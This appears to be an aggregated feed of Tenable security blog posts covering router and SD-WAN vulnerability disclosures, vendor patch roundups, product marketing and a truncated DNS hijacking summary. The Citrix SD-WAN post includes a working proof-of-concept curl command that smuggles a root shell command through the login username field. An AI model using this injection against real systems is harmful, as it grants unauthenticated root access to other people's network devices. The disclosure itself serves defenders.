Quantcast
Channel: Tenable Blog
Viewing all 1936 articles
Browse latest View live

Verizon Fios Quantum Gateway Routers Patched for Multiple Vulnerabilities

$
0
0

<p>Tenable Research discovered multiple vulnerabilities in Verizon’s Fios Quantum Gateway routers.</p>
<h2>Background</h2>
<p>Tenable Research has discovered multiple vulnerabilities in the <a href="https://www.verizon.com/home/accessories/fios-quantum-gateway/" target="_blank" rel="noopener noreferrer" title="Tenable Research discovered multiple vulnerabilities in Verizon Fios Quantum Gateway">Verizon Fios Quantum Gateway</a> (G1100) router. Verizon has released firmware version 02.02.00.13 to fix these vulnerabilities.</p>
<h2>Analysis</h2>
<p>There is a sticker on the side of the routers. Each customer is given a different Wireless network name, Wireless password, and Administrator password. These vulnerabilities are focused around the Administrator password, not the password you use to connect to the Wi-Fi. The Administrator password is there for the Verizon customer to log into the router to perform various tasks that define the network. The vulnerabilities include:</p>
<h3>CVE-2019-3914 - Authenticated Remote Command Injection</h3>
<p>This vulnerability can be triggered by adding a firewall access control rule for a network object with a crafted hostname. An attacker must be authenticated to the device's administrative web application in order to perform the command injection. In most cases, the vulnerability can only be exploited by attackers with local network access. However, an internet-based attack is feasible if remote administration is enabled; it is disabled by default.</p>
<h3>CVE-2019-3915 - Login Replay</h3>
<p>Because HTTPS is not enforced in the web administration interface, an attacker on the local network segment can intercept login requests using a packet sniffer. These requests can be replayed to give the attacker admin access to the web interface. From here, the attacker could exploit CVE-2019-3914.</p>
<h3>CVE-2019-3916 - Password Salt Disclosure</h3>
<p>An unauthenticated attacker is able to retrieve the value of the password salt by simply visiting a URL in a web browser. Given that the firmware does not enforce the use of HTTPS, it is feasible for an attacker to capture (sniff) a login request. The login request contains a salted password hash (SHA-512), so the attacker could then perform an offline dictionary attack to recover the original password.</p>
<h2>Impact</h2>
<p>These routers are supplied to all new Verizon Fios customers unless they elect to use their own router, which isn’t very common. Tenable researcher <a href="https://twitter.com/lynerc" target="_blank" rel="noopener noreferrer" title="Tenable Researcher Chris Lyne on Twitter">Chris Lyne</a> has outlined several potential attack scenarios for these vulnerabilities.</p>
<h4>Scenario 1: Rebellious teen (insider threat)</h4>
<p><i>CVE-2019-3915 - Login Replay</i></p>
<p>Let's assume the Verizon customer is a parent of a teenager. The teenager wants to circumvent parental controls, as teens are wont to do. Let's assume the parent is smart and has changed the Administrator password for the router. The teen can’t just use the credentials on the sticker to log into the administrative interface and change the parental controls. They have to try something else.</p>
<p>It's safe to say that a concerned parent would log into the router from time to time to check whether the teen has tried to flout the parental controls. Because HTTPS is not enforced in the web browser, a clever teen could perform packet sniffing and record the parent’s login. After recording the login sequence, the teen could then replay the login to gain access to the router's administrative interface (CVE-2019-3915). At this point, he or she could change the parental controls, delete evidence of misbehavior, etc.</p>
<h4>Scenario 2: The house guest who never left (insider threat, remote attack)</h4>
<p><i>CVE-2019-3914 - Authenticated Remote Command Injection</i></p>
<p>People have house guests over all the time - family members, friends, friends of friends, or maybe even AirBNB guests. Often, you'll give your guests your Wi-Fi password (WPA2 key) to allow them to use your internet connection.</p>
<p>So, the house guest is physically in your home and has connected to your Wi-Fi. The house guest can determine your public IP address by visiting <a href="https://www.whatismyip.com/" target="_blank" rel="noopener noreferrer" title="https://www.whatismyip.com/">https://www.whatismyip.com/</a> on their mobile device. They could also take a photo of the credential sticker on the Verizon Fios Quantum Gateway router.</p>
<p>Using this information, the house guest could do either of the following:</p>
<ol>
<li>Log into the router's administrative web interface to enable Remote Administration.</li>
<li>Hope that Remote Administration is already enabled. (A <a href="https://www.shodan.io/search?query=title%3A%22Verizon+Router%22&amp;lang... target="_blank" rel="noopener noreferrer" title="Shodan.io search for Verizon Fios router vulnerabilities">Shodan.io search</a> shows 15,323 Verizon routers with Remote Administration enabled.)</li>
</ol>
<p>After the house guest leaves, he or she can exploit CVE-2019-3914 remotely, from across the internet, to gain remote root shell access to the router's underlying operating system. From here, the house guest has control of the network. The attacker can create back doors, record sensitive internet transactions, pivot to other devices, etc.</p>
<h4>Scenario 3: Verizon tech support social engineering (remote attack)</h4>
<p><i>CVE-2019-3914 - Authenticated Remote Command Injection</i></p>
<p>Social engineering attacks aren’t just about phishing campaigns and data breaches due to untrained employees. They happen against “average” consumers all the time, too. It is entirely possible that a malicious actor would perform social engineering by masquerading as a Verizon tech support employee.</p>
<p>In this scenario, the attacker, posing as a customer support employee, calls a Verizon customer (victim) and pretends there is some sort of an issue with their Verizon Fios service. The attacker asks the customer for his/her Administrator password on the side of the router and to log into the router's admin web interface. At this point, the attacker could ask for the Public IP address which is conveniently displayed immediately after logging in. Also, the attacker would ask the victim to enable Remote Administration.</p>
<p>With this information, the attacker can exploit CVE-2019-3914 remotely, with the same outcome as Scenario 2.</p>
<h2>Solution</h2>
<p>Users are urged to confirm that their router is updated to version 02.02.00.13, and if not, contact Verizon for more information. It is recommended that users keep remote administration disabled.</p>
<h2>Additional information</h2>
<ul>
<li>Visit the <a href="https://medium.com/tenable-techblog/verizon-fios-router-authenticated-co... target="_blank" rel="noopener noreferrer" title="Tenable Tech Blog on Medium">Tenable Tech Blog on Medium</a> to read researcher <a href="https://twitter.com/lynerc" target="_blank" rel="noopener noreferrer" title="Tenable Researcher Chris Lyne on Twitter">Chris Lyne</a>’s in-depth story about his work uncovering these vulnerabilities</li>
<li><a href="https://www.tenable.com/security/research/tra-2019-17" target="_blank" rel="noopener noreferrer" title="Tenable Advisory">Tenable Advisory</a></li>
</ul>
<p><b><i>Learn more about <a href="https://www.tenable.com/products">Tenable</a>, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a <a href="https://www.tenable.com/products/tenable-io/vulnerability-management/eva... 60-day trial</a> of Tenable.io Vulnerability Management. </i></b></p>


Critical Vulnerability in Siemens Spectrum Power (CVE-2019-6579) Patched in Monthly Advisory

$
0
0

<p>Siemens Security Advisory Day (SAD) for April 2019 addresses a variety of vulnerabilities, including a critical vulnerability in Siemens Spectrum Power.</p>
<h3>Background</h3>
<p>On April 9, Siemens published its monthly Siemens Advisory Day release across a variety of Siemens products. This includes 11 CVEs newly addressed in Siemens products along with updates to previous advisories, including additional CVEs and product updates and mitigations. The most critical of these vulnerabilities could give an unauthenticated attacker administrative privileges.</p>
<h3>Analysis</h3>
<p>Siemens Spectrum Power 4.7 customers that utilize project enhancement (PE) Web Office Portal (WOP) are vulnerable to <a href="https://cert-portal.siemens.com/productcert/txt/ssa-324467.txt" target="_blank" rel="noopener noreferrer" title="CVE-2019-6579">CVE-2019-6579</a>, a critical vulnerability that an unauthenticated attacker with network access could exploit to obtain administrative privileges. This vulnerability has the highest CVSSv3 score possible of 10.0, as it requires no user interaction, and can be exploited as long as WOP is used and the attacker has access to the web server via TCP port 80 or port 443.</p>
<p>Other newly addressed CVEs in Siemens products include denial of service vulnerabilities within the web server (<a href="https://cert-portal.siemens.com/productcert/txt/ssa-480230.txt" target="_blank" rel="noopener noreferrer" title="CVE-2019-6568">CVE-2019-6568</a>) and the <a href="https://new.siemens.com/global/en/products/automation/industrial-communi... target="_blank" rel="noopener noreferrer" title="OPC UA">OPC UA</a>&nbsp;server (<a href="https://cert-portal.siemens.com/productcert/txt/ssa-307392.txt" target="_blank" rel="noopener noreferrer" title="CVE-2019-6575">CVE-2019-6575</a>) of Siemens products. Both of these CVEs have a CVSSv3 score of 7.5.</p>
<p>There were also multiple vulnerabilities patched in components and libraries used by Siemens products, including curl and libcurl in the <a href="https://cert-portal.siemens.com/productcert/txt/ssa-436177.txt" target="_blank" rel="noopener noreferrer" title="SINEMA Remote Connect">SINEMA Remote Connect</a>&nbsp;(CVE-2018-1461, CVE-2018-16890, CVE-2019-3822) and the Quagga BGP daemon in <a href="https://cert-portal.siemens.com/productcert/txt/ssa-451142.txt" target="_blank" rel="noopener noreferrer" title="RUGGEDCOM ROX II">RUGGEDCOM ROX II</a>&nbsp;(CVE-2018-5379, CVE-2018-5380, CVE-2018-5381). <a href="https://nvd.nist.gov/vuln/detail/CVE-2018-5379" target="_blank" rel="noopener noreferrer" title="CVE-2018-5379">CVE-2018-5379</a>&nbsp;is a critical double free vulnerability with a CVSSv3 score of 9.8, that could be exploited via a spoofed BGP UPDATE message delivered on the network, resulting in denial of service (DoS) or achieving arbitrary code execution. CVE-2019-6570 appears to be a vulnerability in the Siemens SINEMA Remote Connect itself, not in a component or library.</p>
<p><a href="https://cert-portal.siemens.com/productcert/txt/ssa-141614.txt" target="_blank" rel="noopener noreferrer" title="CVE-2017-12741">CVE-2017-12741</a> is a denial of service vulnerability in the Siemens SIMOCODE pro V EIP that could be exploited by a remote attacker sending specially crafted packets to UDP port 161. While this advisory is the first release (1.0) from Siemens about this CVE for this product, the CVE itself is associated with a variety of <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-12741#vulnConfigurationsArea" target="_blank" rel="noopener noreferrer" title="Siemens product configurations">Siemens product configurations</a>&nbsp;already.</p>
<p>The remaining CVEs addressed in this month’s SAD are updates to previous advisories published by Siemens. For instance, <a href="https://cert-portal.siemens.com/productcert/txt/ssa-901333.txt" target="_blank" rel="noopener noreferrer" title="SSA-901333">SSA-901333</a>&nbsp;contains an update for the <a href="https://www.tenable.com/blog/responding-to-krack-what-you-need-to-know" target="_blank" rel="noopener noreferrer" title="KRACK (Key Reinstallation Attack)">KRACK (Key Reinstallation Attack)</a>&nbsp;vulnerabilities for the SINAMICS V20 Smart Access Module while <a href="https://cert-portal.siemens.com/productcert/txt/ssa-268644.txt" target="_blank" rel="noopener noreferrer" title="SSA-268644">SSA-268644</a>&nbsp;adds updates to solutions for <a href="https://www.tenable.com/blog/spectre-and-meltdown-still-haunting-intelamd" target="_blank" rel="noopener noreferrer" title="variants 3a and 4 of Spectre-NG">variants 3a and 4 of Spectre-NG</a>&nbsp;for the SIMATIC HMI Panels V14.</p>
<h3>Solution</h3>
<p>Spectrum Power 4.7 users can obtain the Web Office Portal fix, Bugfix bf-47456_PE_WOP_fix by contacting Siemens Energy Customer Support at <a href="mailto:support.energy@siemens.com" target="_blank" rel="noopener noreferrer" title="support.energy@siemens.com">support.energy@siemens.com</a>.</p>
<p>Siemens SINEMA Remote Connect Client <a href="https://support.industry.siemens.com/cs/de/en/view/109764829" target="_blank" rel="noopener noreferrer" title="V2.0 HF1">V2.0 HF1</a>, Server <a href="https://support.industry.siemens.com/cs/de/en/view/109764829" target="_blank" rel="noopener noreferrer" title="V2.0">V2.0</a>&nbsp;and SIMOCODE pro V EIP <a href="https://support.industry.siemens.com/cs/ww/en/view/109756912" target="_blank" rel="noopener noreferrer" title="V1.0.2">V1.0.2</a>&nbsp;is also available for download, while RUGGEDCOM ROX II V2.13.0 can be obtained by contacting the <a href="https://support.industry.siemens.com/my/WW/en/requests#createRequest" target="_blank" rel="noopener noreferrer" title="RUGGEDCOM support team">RUGGEDCOM support team</a>.</p>
<p>For the denial of service vulnerabilities in Siemens industrial product <a href="https://cert-portal.siemens.com/productcert/txt/ssa-480230.txt" target="_blank" rel="noopener noreferrer" title="web servers">web servers</a>&nbsp;and <a href="https://cert-portal.siemens.com/productcert/txt/ssa-307392.txt" target="_blank" rel="noopener noreferrer" title="OPC UA servers">OPC UA servers</a>, please refer to the respective Siemens Security Advisory documents for associated product updates and/or mitigation steps.</p>
<p>For solutions and updates on older advisories, including additional CVEs and availability of patches or mitigations, please refer to the table below</p>
<div>
<table>
<tbody>
<tr>
<td>
<p><span style="font-weight: 400;"><b>Siemens Security Advisory ID</b></span></p>
</td>
<td>
<p><span style="font-weight: 400;"><b>Document Title</b></span></p>
</td>
<td>
<p><span style="font-weight: 400;"><b>Document</b></span></p>
</td>
</tr>
<tr>
<td>
<p><span style="font-weight: 400;">SSA-179516</span></p>
</td>
<td>
<p><span style="font-weight: 400;">OpenSSL Vulnerability in Industrial Products</span></p>
</td>
<td>
<p><span style="font-weight: 400;"><a href="https://cert-portal.siemens.com/productcert/txt/ssa-179516.txt" target="_blank" rel="noopener noreferrer">TXT</a></span></p>
</td>
</tr>
<tr>
<td>
<p><span style="font-weight: 400;">SSA-268644</span></p>
</td>
<td>
<p><span style="font-weight: 400;">Spectre-NG (Variants 3a and 4) Vulnerabilities in Industrial Products</span></p>
</td>
<td>
<p><span style="font-weight: 400;"><a href="https://cert-portal.siemens.com/productcert/txt/ssa-268644.txt" target="_blank" rel="noopener noreferrer">TXT</a></span></p>
</td>
</tr>
<tr>
<td>
<p><span style="font-weight: 400;">SSA-844562</span></p>
</td>
<td>
<p><span style="font-weight: 400;">Multiple Vulnerabilities in Licensing Software for WinCC OA</span></p>
</td>
<td>
<p><span style="font-weight: 400;"><a href="https://cert-portal.siemens.com/productcert/txt/ssa-844562.txt" target="_blank" rel="noopener noreferrer">TXT</a></span></p>
</td>
</tr>
<tr>
<td>
<p><span style="font-weight: 400;">SSA-901333</span></p>
</td>
<td>
<p><span style="font-weight: 400;">KRACK Attacks Vulnerabilities in Industrial Products</span></p>
</td>
<td>
<p><span style="font-weight: 400;"><a href="https://cert-portal.siemens.com/productcert/txt/ssa-901333.txt" target="_blank" rel="noopener noreferrer">TXT</a></span></p>
</td>
</tr>
<tr>
<td>
<p><span style="font-weight: 400;">SSB-439005</span></p>
</td>
<td>
<p><span style="font-weight: 400;">Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</span></p>
</td>
<td>
<p><span style="font-weight: 400;"><a href="https://cert-portal.siemens.com/productcert/txt/ssb-439005.txt" target="_blank" rel="noopener noreferrer">TXT</a></span></p>
</td>
</tr>
</tbody>
</table>
</div>

<p></p>

<h3>Identifying affected systems</h3>

<p>A list of Nessus plugins to identify these vulnerabilities will appear <a href="https://www.tenable.com/plugins/search?q=%22SSA-141614%22%2C%20%22SSA-30... target="_blank" rel="noopener noreferrer" title="Nessus Plugins for Siemens CVEs">here</a>&nbsp;as they’re released.</p>

<h3>Get more information</h3>
<ul>
<li><a href="https://cert-portal.siemens.com/productcert/txt/ssa-324467.txt" target="_blank" rel="noopener noreferrer" title="Siemens Security Advisory for Spectrum Power 4.7">Siemens Security Advisory for Spectrum Power 4.7</a></li>
<li><a href="https://cert-portal.siemens.com/productcert/txt/ssa-307392.txt" target="_blank" rel="noopener noreferrer" title="Siemens Security Advisory for Denial-of-Service in OPC UA in Industrial Products">Siemens Security Advisory for Denial-of-Service in OPC UA in Industrial Products</a></li>
<li><a href="https://cert-portal.siemens.com/productcert/txt/ssa-141614.txt" target="_blank" rel="noopener noreferrer" title="Siemens Security Advisory for Denial-of-Service in SIMOCODE pro V EIP">Siemens Security Advisory for Denial-of-Service in SIMOCODE pro V EIP</a></li>
<li><a href="https://cert-portal.siemens.com/productcert/txt/ssa-480230.txt" target="_blank" rel="noopener noreferrer" title="Siemens Security Advisory for Denial-of-Service in Web Server of Industrial Products">Siemens Security Advisory for Denial-of-Service in Web Server of Industrial Products</a></li>
<li><a href="https://cert-portal.siemens.com/productcert/txt/ssa-436177.txt" target="_blank" rel="noopener noreferrer" title="Siemens Security Advisory for Multiple Vulnerabilities in SINEMA Remote Connect">Siemens Security Advisory for Multiple Vulnerabilities in SINEMA Remote Connect</a></li>
<li><a href="https://cert-portal.siemens.com/productcert/txt/ssa-451142.txt" target="_blank" rel="noopener noreferrer" title="Siemens Security Advisory for Multiple Vulnerabilities in RUGGEDCOM ROX II">Siemens Security Advisory for Multiple Vulnerabilities in RUGGEDCOM ROX II</a></li>
</ul>
<p><b><i>Join <a href="https://community.tenable.com/s/group/0F9f2000000fyxyCAA/cyber-exposure-... Security Response Team</a> on the Tenable Community.</i></b></p>
<p><b><i> Learn more about <a href="https://www.tenable.com/products">Tenable</a>, the first Cyber Exposure platform for holistic management of your modern attack surface. </i></b></p>
<p>Get a <a href="https://www.tenable.com/products/tenable-io/vulnerability-management/eva... 60-day trial</a> of Tenable.io Vulnerability Management.</p>

Why Global Collaboration Is Key to Effective Cyber Defense

$
0
0

The proliferation of connected devices is driving exponential growth in the digital attack surface, making it increasingly important for businesses, organizations and governments to collaborate on eliminating blind spots, prioritizing threats and reducing exposure and loss.

Effective cybersecurity requires a mix of innovative technologies at the business level and sound policy at all government levels to enable technology development and deter bad actors. Because cyber threat actors operate across national borders, businesses and governments should strive to pursue technological partnerships and global policy alignment. Establishing strong cybersecurity technology partnerships, and strengthening alignment of effective global cybersecurity policies, will help global businesses and governments address today’s threat landscape and stand better prepared to handle the adversaries of tomorrow.

On March 1, Tenable hosted the Australian Cyber Security Mission to the USA 2019, a delegation of Australian cybersecurity company executives, federal, state and territory government officials, and leading cybersecurity academics, at our Columbia, Maryland, headquarters. The purpose of the Mission, which was organized by the Australian Trade and Investment Commission (Austrade) in partnership with the Australian Cyber Security Growth Network (AustCyber), was to introduce the delegation to leading technology and financial companies, business associations, and government agencies in the New York City, Washington D.C., and San Francisco areas in order to share best practices, learn about innovation strategies, and explore potential partnerships. The delegation also attended the RSA Conference, one of the world’s largest and most renowned cybersecurity conventions.

During the visit to Tenable, Co-Founder Jack Huffard and Chief Financial Officer Steve Vintz provided an overview of Tenable’s major innovation milestones. The meetings with the delegation presented the Tenable team with a unique opportunity to discuss the global cybersecurity ecosystem. We discovered that we are all in heated agreement that cybersecurity cannot be solved through a single, silver bullet approach. Rather, effective cybersecurity is dependent upon on a mix of complementary technologies, practices, and processes.

Tenable partners with a range of innovative technology companies to bring leading, integrated cybersecurity solutions to our customers. Throughout the presentations and follow-on discussions, Tenable leaders emphasized the value we place on innovative business partnerships, including with international partners.

The RSA Conference in San Francisco in early March provided additional opportunities for the delegation and Tenable to explore technology partnerships and discuss global policy objectives, including with government officials from both the USA and Australia. While there was vigorous discussion across a range of issues, we picked up on some key themes of agreement:

  • There is a critical need for international policy alignment among allied governments to expose bad cyber actors and establish norms for cyber behavior.
  • Flexible, outcome-oriented cybersecurity policies can help raise the bar for improving cyber hygiene while allowing for continued innovation.
  • Effective public-private partnerships, including those with international allies, will be vital to helping protect critical national infrastructure.

Industry and government have a responsibility to take firm action on cybersecurity, particularly as the threat landscape grows and expands. Cybersecurity transcends our traditional geographic lines. Bad actors don’t consider physical borders, and therefore our global strategy to combat critical cybersecurity issues shouldn’t either.

Learn more:

Critical OS Command Injection Vulnerability in Citrix SD-WAN Center Discovered

$
0
0

Tenable Research has discovered a critical vulnerability in Citrix SD-WAN Center that could lead to remote code execution.

Background

On April 10, Citrix released a security bulletin for CVE-2019-10883, an operating system (OS) command injection vulnerability in Citrix SD-WAN Center 10.2.x before 10.2.1 and NetScaler SD-WAN Center 10.0.x before 10.0.7. Tenable Research discovered this vulnerability while developing a plugin for CVE-2017-6316 and reported it to Citrix.

Citrix Netscaler SD-WAN (software defined wide-area network) allows enterprises to manage their networks and create a virtual WAN. These types of products are used to support branch offices and remote data centers, and to maintain connectivity for cloud-based applications. According to the Citrix website, Netscaler SD-WAN is used in several industries like shipping, non-profit, hospitality and others.

Analysis

While reviewing CTX236992, Tenable Research observed that most of the vulnerabilities in this security bulletin required authentication. For the purpose of writing an uncredentialed Nessus plugin, we ended up looking at two unauthenticated command injection vulnerabilities mentioned in the writeup by the researchers who were credited in CTX236992. These vulnerabilities appeared to be linked to CVE-2017-6316, a vulnerability in the Citrix SD-WAN appliance.

Through our research of CVE-2017-6316, we discovered the Citrix SD-WAN Center 10.2.0.136.733315 was vulnerable to insufficient validation of user-supplied data ($username) in the controller located at /home/talariuser/www/app/Controller/UsersController.php (CVE-2019-10883).

Proof of concept

An unauthenticated remote attacker could exploit this vulnerability to execute arbitrary commands with root privileges. This could be achieved by running the following cURL command:

curl -skv --tlsv1.2 -d '_method=POST&data%5BUser%5D%5Busername%5D=%60sudo%20id%20>/tmp/test%60&data%5BUser%5D%5Bpassword%5D=my_password&data%5BUser%5D%5BsecPassword%5D=my_secPassword' 'https://[target_host]/login'

The output from running this command:

root@VWC:/home/talariuser/www/app/Controller# cat /tmp/test

uid=0(root) gid=0(root) groups=0(root)

Vendor response

Tenable Research contacted Citrix in early February and confirmed they reproduced the vulnerability by the end of February. Citrix published its security bulletin for this vulnerability on April 10.

Solution

Users should upgrade to Citrix SD-WAN Center 10.2.1 or later and NetScaler SD-WAN Center 10.0.7 or later. Additionally, Citrix provided a list of best practices that should be used to harden the security of the SD-WAN Center.

Get more information

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface.

Get a free 60-day trial of Tenable.io Vulnerability Management.

Predictive Prioritization Is Now Available in Tenable.io!

$
0
0

Predictive Prioritization is a game-changer for risk-based vulnerability management. And now it’s a core capability of Tenable.io, helping you focus first on the 3% of vulnerabilities that matter most.

We are excited to announce that Predictive Prioritization is now available in Tenable.io to help you focus first on the security issues that matter most.

The traditional method of prioritizing vulnerabilities using CVSS has significant limitations. It scores the majority of CVEs as “High” or “Critical,” exacerbating the vulnerability overload problem. If everything is important, then nothing truly is. 

Tenable.io VPR

Experts agree: CVSS doesn’t answer what to patch first

We’re not the only ones recognizing the limitations of prioritizing vulnerabilities using CVSS alone. The Carnegie Mellon University Software Engineering Institute published Towards Improving CVSS in December 2018, concluding that CVSS doesn’t answer the fundamental question of what vulnerabilities organizations should patch first:

“CVSS is designed to identify the technical severity of a vulnerability. What people seem to want to know, instead, is the risk a vulnerability or flaw poses to them, or how quickly they should respond to a vulnerability.”

Predictive Prioritization can help with remediation efficiency

Predictive Prioritization combines more than 150 data sources, including both Tenable and third-party vulnerability data as well as threat intelligence, to identify the vulnerabilities with the highest likelihood of exploitability. This dramatically improves your remediation efficiency and effectiveness by allowing you to focus on the 3% of vulnerabilities that have been – or will likely be – exploited.

Predictive Prioritization Machine Learning

Vulnerability Priority Rating: Prioritizing remediation according to risk

Predictive Prioritization generates a Vulnerability Priority Rating (VPR) score ranging from 1 (lowest risk) to 10 (highest risk), which changes with the threat landscape. VPR is now a core data element in Tenable.io to help you prioritize remediation based on actual cyber risk.

Additional capabilities now available in Tenable.io

We’re also introducing additional capabilities to help you get the most value from Predictive Prioritization:

Understanding VPR Key Drivers

Get contextual insights into the factors influencing the VPR calculation, including CVSSv3 impact score, threat recency and exploit code maturity.

Sorting vulnerabilities by VPR score

Sort through vulnerabilities by VPR severity to quickly understand and investigate the full list of high-risk vulnerabilities. Also, compare vulnerabilities with high VPR but low CVSS scores to see the difference firsthand.

New dashboards based on VPR

Take advantage of the new VPR widget on the main Tenable.io dashboard (see above screenshot) to understand and analyze which critical vulnerabilities you need to address immediately.

The takeaway: You now have a tremendous amount of vulnerability information at your fingertips in Tenable.io.

For example, let’s look at the Amazon Linux vulnerability from a few months ago. CVSSv3 scores this Linux kernel weakness as 5.9. Amazon Linux Vulnerability

But, VPR scores it 9.2 due to its high exploit code maturity, product coverage and threat recency. If you have this vulnerability in your environment, run ‘yum update kernel’ and reboot the instance pronto!

Tenable.io continues to earn customer praise

Although we’re only four months into 2019, it’s been a busy year for Tenable.io. The product was recognized as the Best Vulnerability Management Solution at the 2019 SC Awards in March. In addition, Tenable was named a March 2019 Gartner Peer Insights Customers’ Choice for Vulnerability Assessment, driven in part by Tenable.io.

We’ve also earned many customer testimonials from organizations such as Verizon Media (formerly Oath), Netskope and Stone Pagamentos discussing why Tenable.io is essential to their security stack.

Zero in on the vulnerabilities that matter most

Incorporating Predictive Prioritization as a core function in Tenable.io is a game-changer for vulnerability management managed in the cloud. If you’re ready to find and fix your most pressing vulnerabilities, start with a Tenable.io trial today.

Learn more about Predictive Prioritization now

Want to learn more about Predictive Prioritization? Here are a few resources to check out:

IT/OT Cybersecurity Convergence: Start Strong with These Six Controls

$
0
0

As IT and OT teams converge, industrial businesses need to create better cybersecurity plans and strategies to confront modern threats. Where's the best place to start? Try these six cybersecurity controls. 

The teams responsible for securing IT and operational technology (OT) in organizations have been able to operate without much interaction because the systems and software they supported were unique and discrete. 

That all started to change a little over a decade ago, and the worlds of IT and OT have been steadily converging ever since. This trend is a byproduct of digital transformation and shifting technologies pushing enterprises of all sizes, including those in the industrial sector, to digitize their infrastructure. This often entails exposing once air-gapped and isolated equipment – think of a device with Windows-based Human/Machine Interface sitting on an OT network – to the wider public internet.

"IT systems are increasingly showing up in the OT environment," Ted Gary, Sr., a senior product marketing manager at Tenable, noted during a recent Tenable webinar entitled Six Common Controls Unite and Strengthen IT/OT Security, which explored the issue of IT and OT convergence and what it means for the overall business.

This convergence of two important and completely different disciplines has led to a growing concern about cybersecurity, as manufacturing equipment and applications which were previously isolated are now subject to the same types of attacks that have plagued IT hardware and software for years. At the same time, Industrial Control Systems (ICS) and supervisory control and data acquisition (SCADA) systems have become a target of Advanced Persistent Threat (APT) groups intent on cyber espionage.

Threats to industrial systems represent a large and growing challenge for CISOs. Having responsibility for overall company security, CISOs must find a way to bridge the gap between IT and OT. It's not an easy task, said Gary, who was joined during the webinar by Seth Matheson, a public sector sales engineer with Tenable.

As the amount of OT finding its way onto the corporate LAN steadily increases, the attack surface expands accordingly. At the same time, since IT is typically responsible for business technology and the networks these system run on, there's some concern about who can take ownership of issues such as patching, since many OT systems cannot be readily patched

 "IT tends to set the policy, but OT owns the controls," Gary added.

 Where to begin? For Gary, the answer is to keep it simple, and start at the beginning.

Six Cybersecurity Controls to Help with IT/OT Convergence

The Center for Internet Security (CIS) offers six basic security controls Gary believes can help enterprises form the basis for a cybersecurity strategy they can use to come to grips with the convergence of IT and OT. The controls are documented in the CIS publication CIS Controls: Implementation Guide for Industrial Control Systems, which Gary contributed to.

 These basic security controls include:

  • Inventory and control of hardware assets
  • Inventory and control of software assets
  • Continuous vulnerability management
  • Controlled use of administrative privileges
  • Secure configurations for hardware and software computers
  • Maintenance, monitoring and analysis of audit logs

"Start with this basic set of controls," Gary said. "It doesn't matter where you are going, you can build on this foundation."

While starting with basic security controls can help enterprises begin the process of bridging the gaps between IT and OT, as well as improving overall cyber hygiene, there are still other significant obstacles to overcome.

For example, a November 2016 survey Tenable commissioned with the Center for Information Security found  organizations are challenged by a lack of trained staff, lack of budget, lack of prioritization and lack of management support among other issues.

So what can CISOs do to meet these challenges?

This is where the so-called "soft skills" come into play. For instance, Gary urged CISOs and other security leaders to work on improving communications to bridge the distance between IT and OT. This can be as simple as setting up informal "Lunch & Learn" sessions between IT and OT during which the two groups can find common ground and agree on a common strategy.

"It'll cost you a couple of pizzas," Gary noted.

These types of conversations can start an enterprise on the road to securing the convergence of IT and OT.

Learn more:

Oracle Critical Patch Update For April Contains 297 Fixes

$
0
0

Oracle fixes nearly 300 vulnerabilities in second Critical Patch Update for 2019, including bugs in WebLogic, Java SE and several product components.

Background

On April 16, Oracle released its Critical Patch Update for April 2019 as part of its quarterly release of fixes for vulnerabilities. This update contains 297 fixes across a number of Oracle products.

Analysis

In its Critical Patch Update for April 2019, Oracle addressed several vulnerabilities (CVE-2019-2645, CVE-2019-2646, CVE-2019-2647, CVE-2019-2648, CVE-2019-2649, CVE-2019-2650) in Oracle WebLogic Server’s WLS Core Components and Web Services that were reported by security researcher Matthias Kaiser and could be exploited remotely without authentication.

This month’s release contains five security fixes for Oracle Java SE components like Windows DLL (CVE-2019-2699), 2D (CVE-2019-2697, CVE-2019-2698) as well as Oracle Java SE and Oracle Java SE Embedded libraries (CVE-2019-2602) and Remote Method Invocation (RMI) (CVE-2019-2684).

Additionally, this month’s release contains fixes for critical vulnerabilities in components including:

Once again, this quarter’s Critical Patch Update contained fixes for CVE-2016-1000031, the Apache Commons FileUpload Remote Code Execution vulnerability discovered by Tenable Research. This vulnerability was fixed across 10 different products/applications suites, including Oracle Communications Applications, Oracle Enterprise Manager Products Suite, and Oracle Fusion Middleware.

The following is a full list of products/applications with vulnerabilities addressed in the April 2019 Critical Patch Update:

  • Oracle Database Server
  • Oracle Berkeley DB
  • Oracle Commerce
  • Oracle Communications Applications
  • Oracle Construction and Engineering Suite
  • Oracle E-Business Suite
  • Oracle Enterprise Manager Products Suite
  • Oracle Financial Services Applications
  • Oracle Food and Beverage Applications
  • Oracle Fusion Middleware
  • Oracle Health Sciences Applications
  • Oracle Hospitality Applications
  • Oracle Java SE
  • Oracle JD Edwards Products
  • Oracle MySQL
  • Oracle PeopleSoft Products
  • Oracle Retail Applications
  • Oracle Siebel CRM
  • Oracle Sun Systems Products
  • Oracle Supply Chain Products
  • Oracle Support Tools
  • Oracle Utilities Applications
  • Oracle Virtualization 

Solution

Customers are advised to apply all relevant patches provided by Oracle in this Critical Patch Update. Please refer to the April 2019 advisory for full details. Identifying affected systems

A list of Nessus plugins to identify these vulnerabilities will appear here as they’re released.

Get more information

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Sea Turtle DNS Hijacking Campaign Utilizes At Least Seven Patched Vulnerabilities

$
0
0

The Sea Turtle campaign exploits seven patchable vulnerabilities dating from 2009 to 2018 to breach organizations and hijack their DNS name records.

Background

On April 17, researchers at Cisco’s Talos Intelligence Group published a blog entitled DNS Hijacking Abuses Trust In Core Internet Service. This blog provided additional details about a two-year attack campaign targeting a variety of businesses and government organizations, particularly those located in the Middle East and North Africa. This blog was preceded by a January 2019 alert from the United States Department of Homeland Security (DHS) about a DNS infrastructure hijacking campaign that included some technical details along with indicators of compromise (IOCs) for the public at large. The DHS alert referenced research from FireEye’s Threat Research team and Crowdstrike, as well as a similar report from Cisco Talos in late November 2018.

Analysis

The analysis of the Sea Turtle campaign sheds light on some of the techniques used to breach targeted organizations including seven previously patched vulnerabilities and spearphishing emails. The vulnerabilities used by the attackers were either used to breach the organizations first or to move laterally within them post-compromise.

The following is Cisco’s list of vulnerabilities observed in the Sea Turtle attacks. It should not be considered a complete list:

Software/System Application Vulnerabilities:

Cisco Product-Related Vulnerabilities:

  • CVE-2017-3881 - Telnet Bug in Cluster Management Protocol for Cisco IOS and IOS XE
